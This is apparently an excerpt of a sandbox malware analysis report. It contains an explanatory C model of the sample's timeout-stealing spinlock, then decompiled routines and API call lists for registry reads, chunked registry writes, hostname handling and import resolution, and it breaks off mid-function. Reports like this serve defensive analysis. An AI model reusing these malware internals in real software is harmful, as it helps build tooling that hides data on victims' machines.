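The routine above is a recursive spinlock with an escape hatch: the lock word at 0x4136b4 is taken with InterlockedExchange, the owning thread may re-enter freely, and any other thread that has waited 0x2710 (10000) ms zeroes the recursion count and takes the lock regardless of whether the holder ever released it. The following C program is an added example for this report, not code from the sample or from Joe Sandbox. It models that control flow with named fields in place of the three globals, takes the clock and the caller's thread id as parameters (so it builds with gcc or clang on any platform, using the __atomic_exchange_n builtin in place of InterlockedExchange), and walks through a free acquisition, a recursive re-entry and a steal after the timeout. The fake clock, the thread ids and the 3-second step are constructed for the demonstration.

```c
/* Model of the lock acquisition decompiled at 0x0040DD05 (added example,
 * not the sample's own code). Globals are replaced by named fields:
 *   lock_word  <- *0x4136b4   owner_tid <- *0x4136b8   count <- *0x4136bc */
#include <stdint.h>
#include <stdio.h>

#define STEAL_TIMEOUT_MS 0x2710u          /* 10000 ms, the constant in the decompilation */

typedef uint32_t tick_t;                  /* GetTickCount returns a 32-bit DWORD; same wraparound */
typedef tick_t (*clock_fn)(void *ctx);

typedef struct {
    long          lock_word;              /* InterlockedExchange target              */
    unsigned long owner_tid;              /* thread id of the current holder         */
    unsigned long count;                  /* recursion depth                         */
} spin_lock_t;

typedef enum { ACQ_FREE, ACQ_RECURSIVE, ACQ_STOLEN } acq_how_t;

/* Mirrors E0040DD05. Returns how the lock was obtained; *spins counts the
 * Sleep(0) yields that were needed (nothing is actually slept). */
static acq_how_t lock_acquire(spin_lock_t *l, unsigned long tid,
                              clock_fn now, void *clk, unsigned *spins)
{
    tick_t start = now(clk);                                   /* _t10 = GetTickCount() */
    acq_how_t how;
    *spins = 0;
    for (;;) {
        /* InterlockedExchange(&lock, 1): store 1, examine the old value */
        long prev = __atomic_exchange_n(&l->lock_word, 1L, __ATOMIC_SEQ_CST);
        if (prev == 0)            { how = ACQ_FREE;      break; }
        if (tid == l->owner_tid)  { how = ACQ_RECURSIVE; break; }   /* owner re-enters */
        if (now(clk) - start >= STEAL_TIMEOUT_MS) {                /* unsigned delta, like DWORD ticks */
            l->count = 0;                                          /* *0x4136bc &= 0 */
            how = ACQ_STOLEN;                                      /* holder never released; take it anyway */
            break;
        }
        (*spins)++;                                                /* Sleep(0); continue; */
    }
    /* L7: bump the recursion count and record the holder */
    l->count++;
    l->owner_tid = tid;
    return how;
}

/* Constructed stand-in for GetTickCount: every read advances by a fixed step. */
typedef struct { tick_t now, step; } fake_clock_t;
static tick_t fake_now(void *ctx)
{
    fake_clock_t *c = ctx;
    tick_t t = c->now;
    c->now += c->step;
    return t;
}

/* Scenario: thread 1 takes the lock twice (recursion depth 2), then thread 2
 * spins until its 10 s budget is gone and steals it. Fills out[] with the
 * three results, reports the thief's spin count, returns the final depth. */
unsigned long lock_demo(acq_how_t out[3], unsigned *spins_of_thief)
{
    spin_lock_t  l   = {0, 0, 0};
    fake_clock_t clk = {0, 3000};                     /* each tick read advances 3 s */
    unsigned spins;
    out[0] = lock_acquire(&l, 1, fake_now, &clk, &spins);           /* ACQ_FREE      */
    out[1] = lock_acquire(&l, 1, fake_now, &clk, &spins);           /* ACQ_RECURSIVE */
    out[2] = lock_acquire(&l, 2, fake_now, &clk, spins_of_thief);   /* ACQ_STOLEN after 3 yields */
    return l.count;                                   /* 1: thread 1's depth of 2 was wiped by the steal */
}

int main(void)
{
    acq_how_t how[3];
    unsigned spins;
    unsigned long depth = lock_demo(how, &spins);
    printf("free=%d recursive=%d stolen=%d thief_spins=%u final_depth=%lu\n",
           how[0] == ACQ_FREE, how[1] == ACQ_RECURSIVE, how[2] == ACQ_STOLEN, spins, depth);
    return 0;
}
```

Build with `cc -O2 lock_model.c`. The point of the scenario is the final depth of 1: after the steal, thread 1 still believes it holds the lock two levels deep while the bookkeeping now says thread 2 holds it once, so whatever the matching release routine (not shown on this page) does with the count, the two threads' views have diverged. The 10-second timeout keeps the sample from deadlocking on a stuck thread at the price of mutual exclusion no longer being guaranteed.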


                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0040DD20
                                                                                • GetTickCount.KERNEL32 ref: 0040DD2E
                                                                                • Sleep.KERNEL32(00000000,?,74CB43E0,?,00000000,0040E538,?,74CB43E0,?,00000000,?,0040A445), ref: 0040DD3B
                                                                                • InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountCurrentThreadTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 3819781495-0
                                                                                • Opcode ID: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                • Instruction ID: 5047c4a85d7ce053583ecb6bfb553561e79882e3d1eaa06aec664d00f8baf4e0
                                                                                • Opcode Fuzzy Hash: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                • Instruction Fuzzy Hash: 1AF0E971604204AFD7505FA5BC84BB53FA4EB48353F008077E109D22A8C77455898F2E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0208C6B4
                                                                                • InterlockedIncrement.KERNEL32(0208C74B), ref: 0208C715
                                                                                • CreateThread.KERNEL32(00000000,00000000,0040B535,00000000,?,0208C747), ref: 0208C728
                                                                                • CloseHandle.KERNEL32(00000000,?,0208C747,00413588,02088A77), ref: 0208C733
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCountCreateHandleIncrementInterlockedThreadTick
                                                                                • String ID: localcfg
                                                                                • API String ID: 1026198776-1857712256
                                                                                • Opcode ID: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
                                                                                • Instruction ID: ad7802854727092c5cb676bd010c12dd24aeb8aea43383852e170b006bc2d0f2
                                                                                • Opcode Fuzzy Hash: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
                                                                                • Instruction Fuzzy Hash: 3E515DB1A00B418FE768AF29C58462BBBF9FB48304B50593FE18BC7A90D774E440DB20
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E004080C9(int* __ecx) {
                                                                                				int _v8;
                                                                                				void* _v12;
                                                                                				int _v16;
                                                                                				char _v20;
                                                                                				char _v52;
                                                                                				char _v312;
                                                                                				void* _t27;
                                                                                				void* _t31;
                                                                                				char* _t35;
                                                                                				char* _t42;
                                                                                				char* _t45;
                                                                                				intOrPtr* _t49;
                                                                                				intOrPtr _t52;
                                                                                				intOrPtr _t57;
                                                                                				void* _t60;
                                                                                				intOrPtr _t63;
                                                                                				void* _t65;
                                                                                				void* _t68;
                                                                                				CHAR _t70;
                                                                                				intOrPtr _t71;
                                                                                
                                                                                				_t56 = __ecx;
                                                                                 				_v8 = 0;                                                // byte count in/out for RegQueryValueExA
                                                                                 				 *0x412c3c = 0;                                         // will receive the value data read from the registry
                                                                                 				 *0x412c38 = 0;                                         // will receive a copy of the value name
                                                                                 				if(E00406EC3() != 0) {
                                                                                 					_t27 = E0040704C(0x410264, 0, 0,  &_v312,  &_v52);     // fills _v312 (used below as the value name) and _v52; both must be non-empty
                                                                                 					_t65 = _t65 + 0x14;
                                                                                 					if(_t27 <= 0 || _v312 == 0 || _v52 == 0) {
                                                                                 						goto L20;
                                                                                 					} else {
                                                                                 						_t35 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);   // sub-key name is built at runtime into the 0x100-byte buffer at 0x4122f8 from the data at 0x4106AC
                                                                                 						_t68 = _t65 + 0x14;
                                                                                 						if(RegOpenKeyExA(0x80000001, _t35, 0, 0x101,  &_v12) != 0) {   // 0x80000001 = HKEY_CURRENT_USER; 0x101 = KEY_QUERY_VALUE | KEY_WOW64_64KEY
                                                                                 							L19:
                                                                                 							E0040EE2A(_t56, 0x4122f8, 0, 0x100);                  // memset-style arguments (buffer, 0, 0x100): the built sub-key name is wiped on failure
                                                                                							_t65 = _t68 + 0xc;
                                                                                							goto L20;
                                                                                						}
                                                                                 						if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, 0,  &_v8) != 0 || _v16 != 1 || _v8 <= 0) {   // lpData = 0: size/type query only; the value must be REG_SZ (type 1) and non-empty
                                                                                							L15:
                                                                                							_t42 =  *0x412c3c; // 0x0
                                                                                							if(_t42 == 0) {
                                                                                								goto L18;
                                                                                							}
                                                                                							E0040EC2E(_t42);
                                                                                							 *0x412c3c = 0;
                                                                                							goto L17;
                                                                                						} else {
                                                                                 							_t45 = E0040EBCC(_v8);                                // allocates _v8 bytes for the data; E0040EC2E (HeapFree, per the subcall list below) is its counterpart
                                                                                 							_pop(_t56);
                                                                                 							 *0x412c3c = _t45;
                                                                                							if(_t45 == 0) {
                                                                                								L18:
                                                                                								RegCloseKey(_v12);
                                                                                								goto L19;
                                                                                							}
                                                                                 							_t56 =  &_v8;
                                                                                 							if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, _t45,  &_v8) != 0) {   // second call reads the REG_SZ data into the new buffer
                                                                                 								goto L15;
                                                                                 							}
                                                                                 							_t49 =  &_v312;
                                                                                 							_t60 = _t49 + 1;
                                                                                 							do {                                                  // inline strlen over the value name
                                                                                 								_t57 =  *_t49;
                                                                                 								_t49 = _t49 + 1;
                                                                                 							} while (_t57 != 0);
                                                                                 							_t52 = E0040EBCC(_t49 - _t60 + 1);                    // allocate strlen + 1 bytes
                                                                                 							_pop(_t56);
                                                                                 							 *0x412c38 = _t52;
                                                                                 							if(_t52 == 0) {
                                                                                 								goto L18;
                                                                                 							}
                                                                                 							E0040EF00(_t52,  &_v312);                             // (dest, src): copies the value name into the buffer kept at 0x412c38
                                                                                							L17:
                                                                                							_pop(_t56);
                                                                                							goto L18;
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                 					E00407EE6(_t56);
                                                                                 					L20:
                                                                                 					_t70 =  *0x4121a8; // 0x0
                                                                                 					if(_t70 != 0) {                                           // string at 0x4121a8 is non-empty (E0040675C opens it with CreateFileA, see the subcall list)
                                                                                 						_t71 =  *0x4121a4; // 0x0
                                                                                 						if(_t71 == 0) {                                       // 0x4121a4 still zero: the file has not been loaded yet
                                                                                 							_t31 = E0040675C(0x4121a8,  &_v20, 0);                // reads the file (SetFileAttributes / CreateFileA / ReadFile per the subcall list); _v20 receives its length (GetFileSize in the same subcall)
                                                                                 							_t61 = _t31;
                                                                                 							if(_t31 != 0) {
                                                                                 								_t63 = _v20;
                                                                                 								 *0x4122d4 = E004024C2(_t61, _t63, 0);            // processes the file contents; result kept in 0x4122d4
                                                                                 								 *0x4121a4 = _t63;                                // length saved so this branch runs once
                                                                                 								E0040EC2E(_t61);                                  // frees the raw file buffer
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					return 1;
                                                                                				}
                                                                                			}


                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 0040815F
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 00408187
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 004081BE
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 00408210
                                                                                  • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000080,?,74CB43E0,00000000), ref: 0040677E
                                                                                  • Part of subcall function 0040675C: CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?,74CB43E0,00000000), ref: 0040679A
                                                                                  • Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,74CB43E0,00000000), ref: 004067B0
                                                                                  • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000002,?,74CB43E0,00000000), ref: 004067BF
                                                                                  • Part of subcall function 0040675C: GetFileSize.KERNEL32(000000FF,00000000,?,74CB43E0,00000000), ref: 004067D3
                                                                                  • Part of subcall function 0040675C: ReadFile.KERNELBASE(000000FF,?,00000040,00408244,00000000,?,74CB43E0,00000000), ref: 00406807
                                                                                  • Part of subcall function 0040675C: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0040681F
                                                                                  • Part of subcall function 0040675C: ReadFile.KERNELBASE(000000FF,?,000000F8,?,00000000,?,74CB43E0,00000000), ref: 0040683E
                                                                                  • Part of subcall function 0040675C: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0040685C
                                                                                  • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
                                                                                  • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesCreateHeapPointerQueryReadValue$CloseFreeOpenProcessSize
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 124786226-2980165447
                                                                                • Opcode ID: f41c48beccc796d99ac39a3e9a8e7a8285e468a1565ebf528982a8b7ec716e81
                                                                                • Instruction ID: c6ff5cc28a73505882571aaa3479db7aabb841166acb9389a4089cab67cb233b
                                                                                • Opcode Fuzzy Hash: f41c48beccc796d99ac39a3e9a8e7a8285e468a1565ebf528982a8b7ec716e81
                                                                                • Instruction Fuzzy Hash: 6641A2B1801109BFEB10EBA19E81DEF777CDB04304F1448BFF545F2182EAB85A948B59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040E095(void* _a4, char* _a8, intOrPtr* _a12, char* _a16, int _a20) {
                                                                                				int _v8;
                                                                                				char* _v12;
                                                                                				void* _v16;
                                                                                				char _v48;
                                                                                				intOrPtr* _t34;
                                                                                				int _t50;
                                                                                				void* _t52;
                                                                                				intOrPtr _t53;
                                                                                				int _t57;
                                                                                				int _t58;
                                                                                				void* _t59;
                                                                                				void* _t60;
                                                                                				void* _t61;
                                                                                
                                                                                				_t57 = 0;
                                                                                				if(RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x20106, 0,  &_v16, 0) != 0) {
                                                                                					return 0;
                                                                                				}
                                                                                				_v12 = _a16;
                                                                                				_t34 = _a12;
                                                                                				_t52 = _t34 + 1;
                                                                                				do {
                                                                                					_t53 =  *_t34;
                                                                                					_t34 = _t34 + 1;
                                                                                				} while (_t53 != 0);
                                                                                				_t55 = _t34 - _t52;
                                                                                				_v8 = 0;
                                                                                				if(_t34 - _t52 > 0x1c) {
                                                                                					_t55 = 0x1c;
                                                                                				}
                                                                                				E0040EE08( &_v48, _a12, _t55);
                                                                                				_t50 = _a20;
                                                                                				_t61 = _t60 + 0xc;
                                                                                				if(_t50 <= _t57) {
                                                                                					L11:
                                                                                					E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
                                                                                					RegDeleteValueA(_v16,  &_v48);
                                                                                					RegCloseKey(_v16);
                                                                                					return 0 | _t50 == _t57;
                                                                                				} else {
                                                                                					while(1) {
                                                                                						_t58 = 0xff000;
                                                                                						if(_t50 < 0xff000) {
                                                                                							_t58 = _t50;
                                                                                						}
                                                                                						E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
                                                                                						_t61 = _t61 + 0xc;
                                                                                						if(RegSetValueExA(_v16,  &_v48, 0, 3, _v12, _t58) != 0) {
                                                                                							break;
                                                                                						}
                                                                                						_v12 =  &(_v12[_t58]);
                                                                                						_t50 = _t50 - _t58;
                                                                                						_v8 = _v8 + 1;
                                                                                						if(_t50 > 0) {
                                                                                							continue;
                                                                                						}
                                                                                						break;
                                                                                					}
                                                                                					_t57 = 0;
                                                                                					goto L11;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
                                                                                • RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E127
                                                                                • RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E158
                                                                                • RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value$CloseCreateDelete
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 2667537340-2980165447
                                                                                • Opcode ID: 72ec9626f1a57597f212d5c6e724b1b36c6131d7c0d684d5184da94b21603b05
                                                                                • Instruction ID: af4a942e7328ea1ce2cdf979f73f75556816175b5134196b99f0fb832a21e1c2
                                                                                • Opcode Fuzzy Hash: 72ec9626f1a57597f212d5c6e724b1b36c6131d7c0d684d5184da94b21603b05
                                                                                • Instruction Fuzzy Hash: 2F218071A00219BBDF209FA6EC89EDF7F79EF08754F008072F904A6190E6718A64DB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RegCreateKeyExA.ADVAPI32(80000001,0208E50A,00000000,00000000,00000000,00020106,00000000,0208E50A,00000000,000000E4), ref: 0208E319
                                                                                • RegSetValueExA.ADVAPI32(0208E50A,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0208E38E
                                                                                • RegDeleteValueA.ADVAPI32(0208E50A,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0208E3BF
                                                                                • RegCloseKey.ADVAPI32(0208E50A,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0208E50A), ref: 0208E3C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value$CloseCreateDelete
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 2667537340-2980165447
                                                                                • Opcode ID: 71be46fcf4b4c1b855c56a8beb8c548cd5d416d4e28516e03566d8543fb954ad
                                                                                • Instruction ID: 5e56b570d59e4ce8178cce3ddfda0903a2687287925dbed8b3ce94cbf59010e2
                                                                                • Opcode Fuzzy Hash: 71be46fcf4b4c1b855c56a8beb8c548cd5d416d4e28516e03566d8543fb954ad
                                                                                • Instruction Fuzzy Hash: 09212D71A00219BBDB21AFA5EC89EDF7FA9EF08750F048061F944A6150E7718A54EB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 020871E1
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02087228
                                                                                • LocalFree.KERNEL32(?,?,?), ref: 02087286
                                                                                • wsprintfA.USER32 ref: 0208729D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Name$AccountFreeLocalLookupUserwsprintf
                                                                                • String ID: |
                                                                                • API String ID: 2539190677-2343686810
                                                                                • Opcode ID: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
                                                                                • Instruction ID: a63f57db9597029000ff4f8d0fe4bc5d960c7dc636aaefd909503b73018d6aee
                                                                                • Opcode Fuzzy Hash: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
                                                                                • Instruction Fuzzy Hash: 2A313A76900209BFDB41EFA8DC49BDB7BACEF04314F148066F859DB214EB75D6488B94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040AD08(CHAR* _a4) {
                                                                                				char _v132;
                                                                                				int _t9;
                                                                                				char _t11;
                                                                                				intOrPtr* _t12;
                                                                                				CHAR* _t13;
                                                                                				CHAR* _t14;
                                                                                
                                                                                				_t9 = gethostname( &_v132, 0x80);
                                                                                				if(_t9 != 0) {
                                                                                					_t14 = _a4;
                                                                                					L15:
                                                                                					if( *_t14 != 0) {
                                                                                						return _t9;
                                                                                					}
                                                                                					return lstrcpyA(_t14, "LocalHost");
                                                                                				}
                                                                                				_t13 = _a4;
                                                                                				_t11 = _v132;
                                                                                				_t12 =  &_v132;
                                                                                				_t14 = _t13;
                                                                                				while(_t11 != 0) {
                                                                                					if(_t11 < 0x61 || _t11 > 0x7a) {
                                                                                						if(_t11 < 0x41 || _t11 > 0x5a) {
                                                                                							if(_t11 < 0x30 || _t11 > 0x39) {
                                                                                								if(_t11 != 0x2e) {
                                                                                									goto L10;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						goto L9;
                                                                                					} else {
                                                                                						L9:
                                                                                						 *_t13 = _t11;
                                                                                						_t13 =  &(_t13[1]);
                                                                                						L10:
                                                                                						_t12 = _t12 + 1;
                                                                                						_t11 =  *_t12;
                                                                                						continue;
                                                                                					}
                                                                                				}
                                                                                				_t9 = lstrlenA(_t14);
                                                                                				if(_t14[_t9] == 0x2e) {
                                                                                					_t9 = lstrlenA(_t14);
                                                                                					_t14[_t9] = 0;
                                                                                				}
                                                                                				goto L15;
                                                                                			}

                                                                                APIs
                                                                                • gethostname.WS2_32(?,00000080), ref: 0040AD1C
                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040AD60
                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040AD69
                                                                                • lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$gethostnamelstrcpy
                                                                                • String ID: LocalHost
                                                                                • API String ID: 3695455745-3154191806
                                                                                • Opcode ID: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
                                                                                • Instruction ID: 5e983dddb47fd7e780230f110e9d304ee880480ae48faa8370a3fb9af9ed59c3
                                                                                • Opcode Fuzzy Hash: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
                                                                                • Instruction Fuzzy Hash: FA0149208443895EDF3107289844BEA3F675F9670AF104077E4C0BB692E77C8893835F
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 0208B51A
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0208B529
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0208B548
                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 0208B590
                                                                                • wsprintfA.USER32 ref: 0208B61E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$File$Local$InformationSystemZonewsprintf
                                                                                • String ID:
                                                                                • API String ID: 4026320513-0
                                                                                • Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                • Instruction ID: 89561329c8317dd72b2e9856f366803a62c44ebd6037ee89c6b7e63d2cf666ba
                                                                                • Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                • Instruction Fuzzy Hash: 38512EB1D0021DAACF54DFD5D8885EEBBF9BF48304F10812AF501A6150E7B84AC9DF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 02086303
                                                                                • LoadLibraryA.KERNEL32(?), ref: 0208632A
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 020863B1
                                                                                • IsBadHugeReadPtr.KERNEL32(-000000DC,00000014), ref: 02086405
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HugeRead$AddressLibraryLoadProc
                                                                                • String ID:
                                                                                • API String ID: 3498078134-0
                                                                                • Opcode ID: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
                                                                                • Instruction ID: e9a8919af375cf8ded5a946453885d255e92373b06e9554dc47347bc373ff34a
                                                                                • Opcode Fuzzy Hash: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
                                                                                • Instruction Fuzzy Hash: 8B417C71A00305AFDB55EF58C884BAEB7F8FF05318F168069E995D7290D772E980EB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 62%
                                                                                			E00402923(void* __ecx, void* __esi, intOrPtr _a4) {
                                                                                				signed int* _v8;
                                                                                				signed int* _v12;
                                                                                				signed int* _v16;
                                                                                				intOrPtr _v20;
                                                                                				intOrPtr _v24;
                                                                                				signed short _v28;
                                                                                				short _v30;
                                                                                				short _v32;
                                                                                				char _v292;
                                                                                				char _v296;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* _t37;
                                                                                				intOrPtr _t41;
                                                                                				signed int* _t42;
                                                                                				signed short _t53;
                                                                                				signed int** _t62;
                                                                                				void* _t67;
                                                                                				void* _t70;
                                                                                				intOrPtr _t71;
                                                                                				intOrPtr* _t79;
                                                                                				signed int* _t80;
                                                                                				void* _t81;
                                                                                				void* _t82;
                                                                                				void* _t83;
                                                                                
                                                                                				_t81 = __esi;
                                                                                				_t37 = 0xc;
                                                                                				_v8 = 0;
                                                                                				_v16 = 0;
                                                                                				if(_a4 >= _t37) {
                                                                                					_t67 = E00402816(_t37, __esi, __ecx, __esi, _a4);
                                                                                					if(_t67 < _a4) {
                                                                                						_t76 =  *(__esi + 6) & 0x0000ffff;
                                                                                						_t41 = ( *(__esi + 0xa) & 0x0000ffff) + ( *(__esi + 8) & 0x0000ffff) + ( *(__esi + 6) & 0x0000ffff);
                                                                                						_v20 = _t41;
                                                                                						_v12 = 0;
                                                                                						if(_t41 <= 0) {
                                                                                							L13:
                                                                                							_t42 = _v16;
                                                                                							L14:
                                                                                							return _t42;
                                                                                						}
                                                                                						while(_t67 < _a4) {
                                                                                							E0040EE2A(_t76,  &_v296, 0, 0x114);
                                                                                							_t70 = E00402871(_t67, _t81, _t76,  &_v292, _a4);
                                                                                							_t15 = _t70 + 0xa; // 0xa
                                                                                							_t83 = _t82 + 0x10;
                                                                                							if(_t15 >= _a4) {
                                                                                								goto L13;
                                                                                							}
                                                                                							_t79 = __imp__#15;
                                                                                							_v32 =  *_t79( *(_t70 + _t81) & 0x0000ffff);
                                                                                							_v30 =  *_t79( *(_t70 + _t81 + 2) & 0x0000ffff);
                                                                                							_t53 =  *_t79( *(_t70 + _t81 + 8) & 0x0000ffff);
                                                                                							_v28 = _t53;
                                                                                							_t71 = _t70 + 0xa;
                                                                                							_v24 = _t71;
